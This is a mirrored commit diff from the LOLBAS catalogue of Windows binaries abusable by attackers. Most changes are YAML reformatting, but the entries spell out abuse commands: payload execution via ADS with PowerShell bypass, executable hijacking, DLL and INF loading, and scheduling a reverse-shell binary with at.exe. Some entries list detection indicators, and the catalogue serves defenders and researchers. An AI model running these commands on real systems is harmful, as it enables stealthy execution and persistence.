mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Merge branch 'master' into master
This commit is contained in:
commit
1b15eccf07
12
.github/workflows/yamllinting.yml
vendored
Normal file
12
.github/workflows/yamllinting.yml
vendored
Normal file
@ -0,0 +1,12 @@
|
|||||||
|
---
|
||||||
|
name: Yaml Lint
|
||||||
|
on: [push, pull_request]
|
||||||
|
jobs:
|
||||||
|
lintFiles:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@v1
|
||||||
|
- name: yaml-lint
|
||||||
|
uses: ibiqlik/action-yamllint@v3
|
||||||
|
with:
|
||||||
|
config_file: .yamllint
|
15
.yamllint
Normal file
15
.yamllint
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
---
|
||||||
|
extends: default
|
||||||
|
yaml-files:
|
||||||
|
- '*.yml'
|
||||||
|
rules:
|
||||||
|
new-line-at-end-of-file:
|
||||||
|
level: warning
|
||||||
|
trailing-spaces:
|
||||||
|
level: warning
|
||||||
|
line-length:
|
||||||
|
level: warning
|
||||||
|
new-lines:
|
||||||
|
level: warning
|
||||||
|
indentation:
|
||||||
|
level: warning
|
@ -34,7 +34,6 @@ Resources:
|
|||||||
- Link: Threatintelreport...
|
- Link: Threatintelreport...
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: John Doe
|
- Person: John Doe
|
||||||
Handle: @johndoe
|
Handle: '@johndoe'
|
||||||
- Person: Ola Norman
|
- Person: Ola Norman
|
||||||
Handle: @olaNor
|
Handle: '@olaNor'
|
||||||
---
|
|
@ -14,5 +14,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/bohops/status/986984122563391488
|
- https://twitter.com/bohops/status/986984122563391488
|
||||||
Notes: Thanks to Jimmy - @bohops
|
Acknowledgement:
|
||||||
|
- Person: Jimmy
|
||||||
|
Handle: '@bohops'
|
@ -22,5 +22,6 @@ Resources:
|
|||||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
||||||
- https://attack.mitre.org/wiki/Technique/T1128
|
- https://attack.mitre.org/wiki/Technique/T1128
|
||||||
- https://twitter.com/teemuluotio/status/990532938952527873
|
- https://twitter.com/teemuluotio/status/990532938952527873
|
||||||
Notes: ''
|
Acknowledgement:
|
||||||
|
- Person: ''
|
||||||
|
- Handle: ''
|
@ -2,8 +2,7 @@
|
|||||||
Name: Nltest.exe
|
Name: Nltest.exe
|
||||||
Description: Credentials
|
Description: Credentials
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
||||||
Description: ''
|
Description: ''
|
||||||
@ -14,4 +13,6 @@ Detection: []
|
|||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/sysopfb/status/986799053668139009
|
- https://twitter.com/sysopfb/status/986799053668139009
|
||||||
- https://ss64.com/nt/nltest.html
|
- https://ss64.com/nt/nltest.html
|
||||||
Notes: Thanks to Sysopfb - @sysopfb
|
Acknowledgement:
|
||||||
|
- Person: Sysopfb
|
||||||
|
Handle: '@sysopfb'
|
||||||
|
@ -3,7 +3,6 @@ Name: Openwith.exe
|
|||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: '2018-05-25'
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: OpenWith.exe /c C:\test.hta
|
- Command: OpenWith.exe /c C:\test.hta
|
||||||
Description: Opens the target file with the default application.
|
Description: Opens the target file with the default application.
|
||||||
@ -16,5 +15,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/harr0ey/status/991670870384021504
|
- https://twitter.com/harr0ey/status/991670870384021504
|
||||||
Notes: Thanks to Matt harr0ey - @harr0ey
|
Acknowledgement:
|
||||||
|
- Person: Matt harr0ey
|
||||||
|
Handle: '@harr0ey'
|
@ -3,7 +3,6 @@ Name: Powershell.exe
|
|||||||
Description: Execute, Read ADS
|
Description: Execute, Read ADS
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: '2018-05-25'
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: powershell -ep bypass - < c:\temp:ttt
|
- Command: powershell -ep bypass - < c:\temp:ttt
|
||||||
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
||||||
@ -14,5 +13,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||||
Notes: Thanks to Moriarty - @Moriarty_Meng
|
Acknowledgement:
|
||||||
|
- Person: Moriarty
|
||||||
|
Handle: '@Moriarty_Meng'
|
@ -18,5 +18,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
||||||
Notes: 'Thanks to '
|
Acknowledgement:
|
||||||
|
- Person: ''
|
||||||
|
- Handle: ''
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Robocopy.exe
|
Name: Robocopy.exe
|
||||||
Description: Copy
|
Description: Copy
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
Categories: []
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
|
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
|
||||||
@ -16,5 +16,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
||||||
Notes: Thanks to Name of guy - @twitterhandle
|
Acknowledgement:
|
||||||
|
- Person: ''
|
||||||
|
- Handle: ''
|
@ -2,8 +2,7 @@
|
|||||||
Name: AcroRd32.exe
|
Name: AcroRd32.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
||||||
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/997997818362155008
|
- https://twitter.com/pabraeken/status/997997818362155008
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Gpup.exe
|
Name: Gpup.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
||||||
Description: Execute another command through gpup.exe (Notepad++ binary).
|
Description: Execute another command through gpup.exe (Notepad++ binary).
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/997892519827558400
|
- https://twitter.com/pabraeken/status/997892519827558400
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Nlnotes.exe
|
Name: Nlnotes.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||||
Description: Run PowerShell via LotusNotes.
|
Description: Run PowerShell via LotusNotes.
|
||||||
@ -14,4 +13,6 @@ Detection: []
|
|||||||
Resources:
|
Resources:
|
||||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
Acknowledgement:
|
||||||
|
- Person: Daniel Bohannon
|
||||||
|
Handle: '@danielhbohannon'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Notes.exe
|
Name: Notes.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||||
Description: Run PowerShell via LotusNotes.
|
Description: Run PowerShell via LotusNotes.
|
||||||
@ -14,4 +13,6 @@ Detection: []
|
|||||||
Resources:
|
Resources:
|
||||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
Acknowledgement:
|
||||||
|
- Person: Daniel Bohannon
|
||||||
|
Handle: '@danielhbohannon'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Nvudisp.exe
|
Name: Nvudisp.exe
|
||||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Nvudisp.exe System calc.exe
|
- Command: Nvudisp.exe System calc.exe
|
||||||
Description: Execute calc.exe as a subprocess.
|
Description: Execute calc.exe as a subprocess.
|
||||||
@ -23,4 +22,7 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Nvuhda6.exe
|
Name: Nvuhda6.exe
|
||||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: nvuhda6.exe System calc.exe
|
- Command: nvuhda6.exe System calc.exe
|
||||||
Description: Execute calc.exe as a subprocess.
|
Description: Execute calc.exe as a subprocess.
|
||||||
@ -23,4 +22,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
||||||
Notes: Thanks to Adam - @hexacorn
|
Acknowledgement:
|
||||||
|
- Person: Adam
|
||||||
|
Handle: '@hexacorn'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: ROCCAT_Swarm.exe
|
Name: ROCCAT_Swarm.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
||||||
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/994213164484001793
|
- https://twitter.com/pabraeken/status/994213164484001793
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -21,7 +21,7 @@ Detection:
|
|||||||
Resources:
|
Resources:
|
||||||
- Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
|
- Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
|
||||||
- Link: https://twitter.com/bartblaze/status/1107390776147881984
|
- Link: https://twitter.com/bartblaze/status/1107390776147881984
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Bart
|
- Person: Bart
|
||||||
Handle: @bartblaze
|
Handle: '@bartblaze'
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Setup.exe
|
Name: Setup.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Run Setup.exe
|
- Command: Run Setup.exe
|
||||||
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/994381620588236800
|
- https://twitter.com/pabraeken/status/994381620588236800
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -3,6 +3,7 @@ Name: Update.exe
|
|||||||
Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.
|
Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.
|
||||||
Author: 'Jesus Galvez'
|
Author: 'Jesus Galvez'
|
||||||
Created: '2020-11-01'
|
Created: '2020-11-01'
|
||||||
|
Commands:
|
||||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||||
Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.
|
Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.
|
||||||
Usecase: Execute binary
|
Usecase: Execute binary
|
||||||
@ -14,5 +15,5 @@ Created: '2020-11-01'
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: '%localappdata%\Whatsapp\Update.exe'
|
- Path: '%localappdata%\Whatsapp\Update.exe'
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process
|
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Usbinst.exe
|
Name: Usbinst.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
||||||
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
|
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/993514357807108096
|
- https://twitter.com/pabraeken/status/993514357807108096
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: VBoxDrvInst.exe
|
Name: VBoxDrvInst.exe
|
||||||
Description: Persistence
|
Description: Persistence
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
||||||
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/993497996179492864
|
- https://twitter.com/pabraeken/status/993497996179492864
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -1,20 +1,20 @@
|
|||||||
Name: aswrundll.exe
|
Name: aswrundll.exe
|
||||||
Description: This process is used by AVAST antivirus to run and execute any modules
|
Description: This process is used by AVAST antivirus to run and execute any modules
|
||||||
Author: Eli Salem
|
Author: Eli Salem
|
||||||
Created: 19\03\2019
|
Created: '2019-03-19'
|
||||||
Commands:
|
Commands:
|
||||||
- Command: "C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"
|
- Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"'
|
||||||
Description: Load and execute modules using aswrundll
|
Description: Load and execute modules using aswrundll
|
||||||
Usecase: Execute malicious modules using aswrundll.exe
|
Usecase: Execute malicious modules using aswrundll.exe
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Any
|
Privileges: Any
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\Avast Software\Avast\aswrundll
|
- Path: 'C:\Program Files\Avast Software\Avast\aswrundll'
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: ["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]
|
- Code: '["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]'
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
|
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Eli Salem
|
- Person: Eli Salem
|
||||||
handle: https://www.linkedin.com/in/eli-salem-954728150
|
handle: 'https://www.linkedin.com/in/eli-salem-954728150'
|
@ -2,7 +2,7 @@
|
|||||||
Name: winword.exe
|
Name: winword.exe
|
||||||
Description: Document editor included with Microsoft Office.
|
Description: Document editor included with Microsoft Office.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: winword.exe /l dllfile.dll
|
- Command: winword.exe /l dllfile.dll
|
||||||
Description: Launch DLL payload.
|
Description: Launch DLL payload.
|
||||||
@ -10,7 +10,7 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
||||||
@ -26,4 +26,4 @@ Acknowledgement:
|
|||||||
Handle: '@@vysecurity'
|
Handle: '@@vysecurity'
|
||||||
- Person: Adam (Internals)
|
- Person: Adam (Internals)
|
||||||
Handle: '@Hexacorn'
|
Handle: '@Hexacorn'
|
||||||
---
|
---
|
||||||
|
@ -2,18 +2,18 @@
|
|||||||
Name: testxlst.js
|
Name: testxlst.js
|
||||||
Description: Script included with Pywin32.
|
Description: Script included with Pywin32.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||||
Categories: Execution
|
Category: Execution
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1064
|
MitreID: T1064
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||||
Categories: Execution
|
Category: Execution
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1064
|
MitreID: T1064
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||||
@ -25,4 +25,6 @@ Detection: []
|
|||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/bohops/status/993314069116485632
|
- https://twitter.com/bohops/status/993314069116485632
|
||||||
- https://github.com/mhammond/pywin32
|
- https://github.com/mhammond/pywin32
|
||||||
Notes: Thanks to Jimmy - @bohops
|
Acknowledgement:
|
||||||
|
- Person: Jimmy
|
||||||
|
Handle: '@bohops'
|
||||||
|
@ -2,12 +2,12 @@
|
|||||||
Name: At.exe
|
Name: At.exe
|
||||||
Description: Schedule periodic tasks
|
Description: Schedule periodic tasks
|
||||||
Author: 'Freddie Barr-Smith'
|
Author: 'Freddie Barr-Smith'
|
||||||
Created: '2019-09-20'
|
Created: 2019-09-20
|
||||||
Commands:
|
Commands:
|
||||||
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
|
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
|
||||||
Description: Create a recurring task to execute every day at a specific time.
|
Description: Create a recurring task to execute every day at a specific time.
|
||||||
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Local Admin
|
Privileges: Local Admin
|
||||||
MitreID: T1053
|
MitreID: T1053
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
||||||
@ -17,10 +17,10 @@ Full_Path:
|
|||||||
- Path: C:\WINDOWS\SysWOW64\At.exe
|
- Path: C:\WINDOWS\SysWOW64\At.exe
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Scheduled task is created
|
- IOC: Scheduled task is created
|
||||||
- IOC: Windows event log - type 3 login
|
- IOC: Windows event log - type 3 login
|
||||||
- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job)
|
- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job)
|
||||||
- IOC: C:\Windows\Tasks\At1.job
|
- IOC: C:\Windows\Tasks\At1.job
|
||||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://freddiebarrsmith.com/at.txt
|
- Link: https://freddiebarrsmith.com/at.txt
|
||||||
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
|
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Atbroker.exe
|
Name: Atbroker.exe
|
||||||
Description: Helper binary for Assistive Technology (AT)
|
Description: Helper binary for Assistive Technology (AT)
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ATBroker.exe /start malware
|
- Command: ATBroker.exe /start malware
|
||||||
Description: Start a registered Assistive Technology (AT).
|
Description: Start a registered Assistive Technology (AT).
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Atbroker.exe
|
- Path: C:\Windows\System32\Atbroker.exe
|
||||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
||||||
@ -26,4 +26,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Adam
|
- Person: Adam
|
||||||
Handle: '@hexacorn'
|
Handle: '@hexacorn'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Bash.exe
|
Name: Bash.exe
|
||||||
Description: File used by Windows subsystem for Linux
|
Description: File used by Windows subsystem for Linux
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: bash.exe -c calc.exe
|
- Command: bash.exe -c calc.exe
|
||||||
Description: Executes calc.exe from bash.exe
|
Description: Executes calc.exe from bash.exe
|
||||||
@ -39,7 +39,7 @@ Commands:
|
